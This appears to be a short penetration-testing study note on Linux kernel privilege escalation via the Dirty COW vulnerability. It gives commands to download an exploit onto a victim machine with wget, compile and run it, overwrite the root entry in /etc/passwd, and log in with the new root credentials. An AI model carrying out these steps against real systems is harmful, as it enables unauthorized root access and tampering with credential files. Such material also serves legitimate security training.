5.2.1 Kernel Exploitation
Kernel Exploitation
Kernel Exploit (PoC)
Dirty COW
This exploit uses the pokemon exploit of the dirtycow vulnerability as a base and automatically generates a new passwd line. The user will be prompted for the new password when the binary is run. The original /etc/passwd file is then backed up to /tmp/passwd.bak and overwrites the root account with the generated line. After running the exploit you should be able to login with the newly created user.
This exploit works only for Linux Kernel vs between 2.6.22 and 3.9, we can check this information with cmd: uname -a
We need to transferring it and run into victim machine to give root privilege, compile it with gcc compiler and run it:
#launch python -m SimpleHTTPServer on attacker machine
#download it on victim machine using: wget http://target_IP:8000/dirtycowexploit.c
gcc -pthread dirtycowexploit.c -o dirtycow -lcrypt
chmod +x dirtycow
./dirtycow
This exploit creates a new couple of username and password with root privilege.
After accessing with this credential, we can check user's permission using id
or whoami
cmd).